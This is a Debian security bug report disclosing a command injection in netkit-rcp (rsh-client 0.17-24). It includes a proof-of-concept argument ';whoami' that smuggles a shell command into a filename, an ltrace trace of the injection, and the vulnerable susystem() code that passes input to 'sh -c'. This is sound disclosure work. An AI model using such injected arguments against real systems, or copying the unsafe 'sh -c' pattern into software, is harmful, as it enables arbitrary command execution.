Bug#1039689: rsh-client: Command injection in netkit-rcp
Package: rsh-client
Version: 0.17-24
Severity: grave
Tags: security
Dear Maintainer,
netkit-rcp, shipped for Debian in the rsh-client package (https://packages.debian.org/bookworm/rsh-client) is vulnerable to a command injection. I am
reaching to you as I could not find the upstream URL of the developpers (I think the project may be unmaintained).
Moritz Mühlenhoff <jmm@inutil.org> confirmed there was no upstream for it
Details:
Tested on rsh-client version 0.17-24:
```
$ apt showsrc rsh-client
Package: netkit-rsh
Binary: rsh-client, rsh-server
Version: 0.17-24
Maintainer: Debian QA Group <packages@qa.debian.org>
[...]
```
Any of the "fN" (files) or "directory" options of the netkit-rcp command line can be used to inject commands. Below is an example injecting a
"whoami" command:
```
$ ltrace /usr/bin/netkit-rcp "test" ";whoami"
getopt(3, 0x7ffd134ccc38, "dfprt") = -1
getservbyname("shell", "tcp") = 0x7f1846a37dc0
getuid() = 1000
getpwuid(1000, 0x7f18469f62ff, 0, 0x7f18469322f7) = 0x7f1846a36a00
snprintf("rcp", 64, "rcp%s%s%s", "", "", "") = 3
signal(SIGPIPE, 0x55c473e09bbc) = 0
strlen("test") = 4
strlen(";whoami") = 7
malloc(38) = 0x55c47528fed0
snprintf("/bin/cp test ;whoami", 38, "%s%s%s %s %s", "/bin/cp", "", "", "test", ";whoami") = 20
vfork(0x55c47528fed0, 0x55c473e0b14f, 0, 1) = 0x3967b2
signal(SIGINT, 0x1) = 0
signal(SIGQUIT, 0x1) = 0
wait(0x7ffd134cca40/bin/cp: missing destination file operand after 'test'
Try '/bin/cp --help' for more information.
kali <== "whoami" result
<no return ...>
--- SIGCHLD (Child exited) ---
<... wait resumed> ) = 3762098
signal(SIGINT, 0) = 0x1
signal(SIGQUIT, 0) = 0x1
free(0x55c47528fed0) = <void>
exit(0 <no return ...>
+++ exited (status 0) +++
```
The faulty code is located in susystem() in rcp/rcp.c:
```
412 static int
413 susystem(const char *s)
414 {
415 int status, pid, w;
416 sighandler istat, qstat;
417
418 if ((pid = vfork()) == 0) {
419 const char *args[4];
420 const char **argsfoo;
421 char **argsbar;
422 if (setuid(userid)) {
423 fprintf(stderr, "rcp: child: setuid: %s\n",
424 strerror(errno));
425 _exit(1);
426 }
427 args[0] = "sh";
428 args[1] = "-c";
429 args[2] = s;
430 args[3] = NULL;
431 /* Defeat C type system to permit passing char ** to execve */
432 argsfoo = args;
433 memcpy(&argsbar, &argsfoo, sizeof(argsfoo));
434 execve(_PATH_BSHELL, argsbar, saved_environ);
435 _exit(127);
436 }
```
A child process is executing "sh -c" (l.434) with no filtering of user input. Note that /usr/bin/netkit-rcp is a root SUID binary on Debian but that the
above code drop privileges before executing the command, preventing privilege escalation (l. 422).
There still is a risk as an attacker able to manipulate filenames of either sources or destination could use it to execute arbitrary commands.
IMO the "sh -c" approach is bad and should be replaced with more secure API calls to execv("/bin/cp", args) or equivalent.
Best regards,
-- System Information:
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2022.3
Codename: kali-rolling
Architecture: x86_64
Kernel: Linux 5.18.0-kali5-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages rsh-client depends on:
ii libc6 2.36-4
rsh-client recommends no packages.
rsh-client suggests no packages.
-- no debconf information
Reply to: